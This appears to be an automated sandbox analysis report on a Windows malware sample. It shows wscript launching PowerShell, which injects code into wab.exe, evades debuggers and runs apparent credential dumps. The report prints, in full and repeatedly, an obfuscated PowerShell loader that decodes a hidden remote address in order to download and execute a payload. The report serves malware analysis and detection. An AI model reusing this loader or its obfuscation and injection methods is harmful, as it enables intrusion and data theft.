Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wscript.exe, 00000000.00000002.1251636537.0000029D2C54C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wab.exe, 00000011.00000002.2549178536.0000000008AB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0E
Source: wscript.exe, 00000000.00000003.1240505483.0000029D2C4A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250511137.0000029D2C446000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1241291623.0000029D2C458000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1241168691.0000029D2C431000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1251482657.0000029D2C446000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1251127481.0000029D2A500000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1251535696.0000029D2C496000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1241392491.0000029D2C4A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250015432.0000029D2C496000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.2004357500.0000019EF5F26000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWre%SystemRoot%\system32\mswsock.dllEndrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.rurenaVekslerlOttom nePassersoMent lha BallisnViv
Source: C:\Program Files (x86)\Windows Mail\wab.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_24573856 GetLastError,___vcrt_FlsGetValue,___vcrt_FlsSetValue,LdrInitializeThunk,___vcrt_FlsSetValue,___vcrt_FlsSetValue,SetLastError, 17_2_24573856
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_245760E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_245760E2
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 20_2_0040DD85
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 20_2_004044A4
Contains functionality to read the PEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_24574AB4 mov eax, dword ptr fs:[00000030h] 17_2_24574AB4
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_2457724E GetProcessHeap, 17_2_2457724E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_245760E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_245760E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_24572639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_24572639
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_24572B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_24572B1C

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_720.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7368, type: MEMORYSTR
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 44E0000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 327F894 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\knsxyccvpjetrdvkvhhergkhudayiyl" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xkkian" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'knyttelversenes brilliancies informatica200 bloodroot skrbeligt157 vulcanisable doseringsapparatet superhuman forbytter branddr simplifier commercializing skuffelserne tillukkede121 transseksualismens stamcafym darkey opdagelsesrejses pretenders preemphasize87 scrawliness standardisations smedemestres antibridal knyttelversenes brilliancies informatica200 bloodroot skrbeligt157 vulcanisable doseringsapparatet superhuman forbytter branddr simplifier commercializing skuffelserne tillukkede121 transseksualismens stamcafym darkey opdagelsesrejses pretenders preemphasize87 scrawliness standardisations smedemestres antibridal';if (${host}.currentculture) {$transplantat++;}function brassart($slingrer){$unbarking=$slingrer.length-$transplantat;$sendetiders='substri';$sendetiders+='ng';for( $catacrotism=7;$catacrotism -lt $unbarking;$catacrotism+=8){$knyttelversenes+=$slingrer.$sendetiders.invoke( $catacrotism, $transplantat);}$knyttelversenes;}function sarcophilus($cerecloth){ & ($grossisten) ($cerecloth);}$deletive=brassart ' unfitlmfer iswomedr.vezleon.teiphotolyl vikin lhemat,rareevoki/saturan5abac.na.japaner0domitiu ,eddykn(servo.ywslvtlysialoewoonho edkld stippeo igmandwrettoryskafk,sk opi,ionnbyrderstcrimina spec.al1awingly0 .ctapo.lilj.rk0ebbinge;camesth afskrmnw gona.eisp.ceryn sundhe6graaspu4vesbite;objekti dobbeltxkammede6aquidne4verserb;pseudom sprogblrscru invandr as:s,eepin1kimblad2leveful1ut ovrd.tintall0 lervar)vinha,d forurengwaggleredravyavc haggadkbantamsodec,nce/fototek2vedlige0 e stra1udram t0scotiat0 doorma1 fluori0mur ero1idrt.kl si detnfdevadr,icetacearhvorefte sond lf .ookbio augmenx elvang/ringvej1thewnes2shikses1porogam.grassch0cleansg ';$capkin=brassart ' ret.imushreddessti hvee.rydelardemoral-unwre.kadramming mik iseirishgrnpopsi,stunaisle ';$skrbeligt157=brassart 'sim,linh paabu.tsugarintboghvedpgeneral: syn,rg/pre.til/lepidob1kl,vare0forudan3uniso,a. ungrea2komp.ns3hum.uri7 sociol.logogra8tetremi6data,le..rammab2antilip4 pissoi7superin/takte.it forsakeopga gsevibratenmaniernt inhesis owshaigradieneunionisr.odalis.bueformla,teriopinspirak mortif ';$conscionableness=brassart 'stateli>stalact ';$grossisten=brassart ' inergiforkodeesemiurnxinosini ';$easters='superhuman';$paleoandesite = brassart ' brudekeblin,tec efterbhpolytypoamar,ll champla%anl sbeasegnefrptidalp.phemocryduncravia spr.gft baromea bick,r% u rmme\waver,namidwif p hnetropspatiumepostnumls andsfmmothbalu dukkeal seed eifamilieg modtaghpithecoe int.rldinkorpo.i.formabtjenestemedi inssortime theopha&sbefabr&a sgnin tyvendeeta terecafflatuh v,rtumounciale droplettsubvers ';sarcophilus (brassart ' underm$spinulagkredit lkldebrsoreekingbpaeanisahjtelskl endrud: enegaiaddictinov.rvine uickexkrakelee vedf,er orchidtsvinek i tvilliokos,forndecentr=nonincl( skyllec themsemslu,gyhdtwin,le mennesk/henvejrcr,exper pelycos$mikaagrpf.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'knyttelversenes brilliancies informatica200 bloodroot skrbeligt157 vulcanisable doseringsapparatet superhuman forbytter branddr simplifier commercializing skuffelserne tillukkede121 transseksualismens stamcafym darkey opdagelsesrejses pretenders preemphasize87 scrawliness standardisations smedemestres antibridal knyttelversenes brilliancies informatica200 bloodroot skrbeligt157 vulcanisable doseringsapparatet superhuman forbytter branddr simplifier commercializing skuffelserne tillukkede121 transseksualismens stamcafym darkey opdagelsesrejses pretenders preemphasize87 scrawliness standardisations smedemestres antibridal';if (${host}.currentculture) {$transplantat++;}function brassart($slingrer){$unbarking=$slingrer.length-$transplantat;$sendetiders='substri';$sendetiders+='ng';for( $catacrotism=7;$catacrotism -lt $unbarking;$catacrotism+=8){$knyttelversenes+=$slingrer.$sendetiders.invoke( $catacrotism, $transplantat);}$knyttelversenes;}function sarcophilus($cerecloth){ & ($grossisten) ($cerecloth);}$deletive=brassart ' unfitlmfer iswomedr.vezleon.teiphotolyl vikin lhemat,rareevoki/saturan5abac.na.japaner0domitiu ,eddykn(servo.ywslvtlysialoewoonho edkld stippeo igmandwrettoryskafk,sk opi,ionnbyrderstcrimina spec.al1awingly0 .ctapo.lilj.rk0ebbinge;camesth afskrmnw gona.eisp.ceryn sundhe6graaspu4vesbite;objekti dobbeltxkammede6aquidne4verserb;pseudom sprogblrscru invandr as:s,eepin1kimblad2leveful1ut ovrd.tintall0 lervar)vinha,d forurengwaggleredravyavc haggadkbantamsodec,nce/fototek2vedlige0 e stra1udram t0scotiat0 doorma1 fluori0mur ero1idrt.kl si detnfdevadr,icetacearhvorefte sond lf .ookbio augmenx elvang/ringvej1thewnes2shikses1porogam.grassch0cleansg ';$capkin=brassart ' ret.imushreddessti hvee.rydelardemoral-unwre.kadramming mik iseirishgrnpopsi,stunaisle ';$skrbeligt157=brassart 'sim,linh paabu.tsugarintboghvedpgeneral: syn,rg/pre.til/lepidob1kl,vare0forudan3uniso,a. ungrea2komp.ns3hum.uri7 sociol.logogra8tetremi6data,le..rammab2antilip4 pissoi7superin/takte.it forsakeopga gsevibratenmaniernt inhesis owshaigradieneunionisr.odalis.bueformla,teriopinspirak mortif ';$conscionableness=brassart 'stateli>stalact ';$grossisten=brassart ' inergiforkodeesemiurnxinosini ';$easters='superhuman';$paleoandesite = brassart ' brudekeblin,tec efterbhpolytypoamar,ll champla%anl sbeasegnefrptidalp.phemocryduncravia spr.gft baromea bick,r% u rmme\waver,namidwif p hnetropspatiumepostnumls andsfmmothbalu dukkeal seed eifamilieg modtaghpithecoe int.rldinkorpo.i.formabtjenestemedi inssortime theopha&sbefabr&a sgnin tyvendeeta terecafflatuh v,rtumounciale droplettsubvers ';sarcophilus (brassart ' underm$spinulagkredit lkldebrsoreekingbpaeanisahjtelskl endrud: enegaiaddictinov.rvine uickexkrakelee vedf,er orchidtsvinek i tvilliokos,forndecentr=nonincl( skyllec themsemslu,gyhdtwin,le mennesk/henvejrcr,exper pelycos$mikaagrpf.
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'knyttelversenes brilliancies informatica200 bloodroot skrbeligt157 vulcanisable doseringsapparatet superhuman forbytter branddr simplifier commercializing skuffelserne tillukkede121 transseksualismens stamcafym darkey opdagelsesrejses pretenders preemphasize87 scrawliness standardisations smedemestres antibridal knyttelversenes brilliancies informatica200 bloodroot skrbeligt157 vulcanisable doseringsapparatet superhuman forbytter branddr simplifier commercializing skuffelserne tillukkede121 transseksualismens stamcafym darkey opdagelsesrejses pretenders preemphasize87 scrawliness standardisations smedemestres antibridal';if (${host}.currentculture) {$transplantat++;}function brassart($slingrer){$unbarking=$slingrer.length-$transplantat;$sendetiders='substri';$sendetiders+='ng';for( $catacrotism=7;$catacrotism -lt $unbarking;$catacrotism+=8){$knyttelversenes+=$slingrer.$sendetiders.invoke( $catacrotism, $transplantat);}$knyttelversenes;}function sarcophilus($cerecloth){ & ($grossisten) ($cerecloth);}$deletive=brassart ' unfitlmfer iswomedr.vezleon.teiphotolyl vikin lhemat,rareevoki/saturan5abac.na.japaner0domitiu ,eddykn(servo.ywslvtlysialoewoonho edkld stippeo igmandwrettoryskafk,sk opi,ionnbyrderstcrimina spec.al1awingly0 .ctapo.lilj.rk0ebbinge;camesth afskrmnw gona.eisp.ceryn sundhe6graaspu4vesbite;objekti dobbeltxkammede6aquidne4verserb;pseudom sprogblrscru invandr as:s,eepin1kimblad2leveful1ut ovrd.tintall0 lervar)vinha,d forurengwaggleredravyavc haggadkbantamsodec,nce/fototek2vedlige0 e stra1udram t0scotiat0 doorma1 fluori0mur ero1idrt.kl si detnfdevadr,icetacearhvorefte sond lf .ookbio augmenx elvang/ringvej1thewnes2shikses1porogam.grassch0cleansg ';$capkin=brassart ' ret.imushreddessti hvee.rydelardemoral-unwre.kadramming mik iseirishgrnpopsi,stunaisle ';$skrbeligt157=brassart 'sim,linh paabu.tsugarintboghvedpgeneral: syn,rg/pre.til/lepidob1kl,vare0forudan3uniso,a. ungrea2komp.ns3hum.uri7 sociol.logogra8tetremi6data,le..rammab2antilip4 pissoi7superin/takte.it forsakeopga gsevibratenmaniernt inhesis owshaigradieneunionisr.odalis.bueformla,teriopinspirak mortif ';$conscionableness=brassart 'stateli>stalact ';$grossisten=brassart ' inergiforkodeesemiurnxinosini ';$easters='superhuman';$paleoandesite = brassart ' brudekeblin,tec efterbhpolytypoamar,ll champla%anl sbeasegnefrptidalp.phemocryduncravia spr.gft baromea bick,r% u rmme\waver,namidwif p hnetropspatiumepostnumls andsfmmothbalu dukkeal seed eifamilieg modtaghpithecoe int.rldinkorpo.i.formabtjenestemedi inssortime theopha&sbefabr&a sgnin tyvendeeta terecafflatuh v,rtumounciale droplettsubvers ';sarcophilus (brassart ' underm$spinulagkredit lkldebrsoreekingbpaeanisahjtelskl endrud: enegaiaddictinov.rvine uickexkrakelee vedf,er orchidtsvinek i tvilliokos,forndecentr=nonincl( skyllec themsemslu,gyhdtwin,le mennesk/henvejrcr,exper pelycos$mikaagrpf. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'knyttelversenes brilliancies informatica200 bloodroot skrbeligt157 vulcanisable doseringsapparatet superhuman forbytter branddr simplifier commercializing skuffelserne tillukkede121 transseksualismens stamcafym darkey opdagelsesrejses pretenders preemphasize87 scrawliness standardisations smedemestres antibridal knyttelversenes brilliancies informatica200 bloodroot skrbeligt157 vulcanisable doseringsapparatet superhuman forbytter branddr simplifier commercializing skuffelserne tillukkede121 transseksualismens stamcafym darkey opdagelsesrejses pretenders preemphasize87 scrawliness standardisations smedemestres antibridal';if (${host}.currentculture) {$transplantat++;}function brassart($slingrer){$unbarking=$slingrer.length-$transplantat;$sendetiders='substri';$sendetiders+='ng';for( $catacrotism=7;$catacrotism -lt $unbarking;$catacrotism+=8){$knyttelversenes+=$slingrer.$sendetiders.invoke( $catacrotism, $transplantat);}$knyttelversenes;}function sarcophilus($cerecloth){ & ($grossisten) ($cerecloth);}$deletive=brassart ' unfitlmfer iswomedr.vezleon.teiphotolyl vikin lhemat,rareevoki/saturan5abac.na.japaner0domitiu ,eddykn(servo.ywslvtlysialoewoonho edkld stippeo igmandwrettoryskafk,sk opi,ionnbyrderstcrimina spec.al1awingly0 .ctapo.lilj.rk0ebbinge;camesth afskrmnw gona.eisp.ceryn sundhe6graaspu4vesbite;objekti dobbeltxkammede6aquidne4verserb;pseudom sprogblrscru invandr as:s,eepin1kimblad2leveful1ut ovrd.tintall0 lervar)vinha,d forurengwaggleredravyavc haggadkbantamsodec,nce/fototek2vedlige0 e stra1udram t0scotiat0 doorma1 fluori0mur ero1idrt.kl si detnfdevadr,icetacearhvorefte sond lf .ookbio augmenx elvang/ringvej1thewnes2shikses1porogam.grassch0cleansg ';$capkin=brassart ' ret.imushreddessti hvee.rydelardemoral-unwre.kadramming mik iseirishgrnpopsi,stunaisle ';$skrbeligt157=brassart 'sim,linh paabu.tsugarintboghvedpgeneral: syn,rg/pre.til/lepidob1kl,vare0forudan3uniso,a. ungrea2komp.ns3hum.uri7 sociol.logogra8tetremi6data,le..rammab2antilip4 pissoi7superin/takte.it forsakeopga gsevibratenmaniernt inhesis owshaigradieneunionisr.odalis.bueformla,teriopinspirak mortif ';$conscionableness=brassart 'stateli>stalact ';$grossisten=brassart ' inergiforkodeesemiurnxinosini ';$easters='superhuman';$paleoandesite = brassart ' brudekeblin,tec efterbhpolytypoamar,ll champla%anl sbeasegnefrptidalp.phemocryduncravia spr.gft baromea bick,r% u rmme\waver,namidwif p hnetropspatiumepostnumls andsfmmothbalu dukkeal seed eifamilieg modtaghpithecoe int.rldinkorpo.i.formabtjenestemedi inssortime theopha&sbefabr&a sgnin tyvendeeta terecafflatuh v,rtumounciale droplettsubvers ';sarcophilus (brassart ' underm$spinulagkredit lkldebrsoreekingbpaeanisahjtelskl endrud: enegaiaddictinov.rvine uickexkrakelee vedf,er orchidtsvinek i tvilliokos,forndecentr=nonincl( skyllec themsemslu,gyhdtwin,le mennesk/henvejrcr,exper pelycos$mikaagrpf. Jump to behavior
Source: wab.exe, 00000011.00000003.1811557960.0000000008B35000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: wab.exe, 00000011.00000003.1811557960.0000000008B35000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager;g
Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Program Manager]
Contains functionality to query CPU information (cpuid)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_24572933 cpuid 17_2_24572933
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
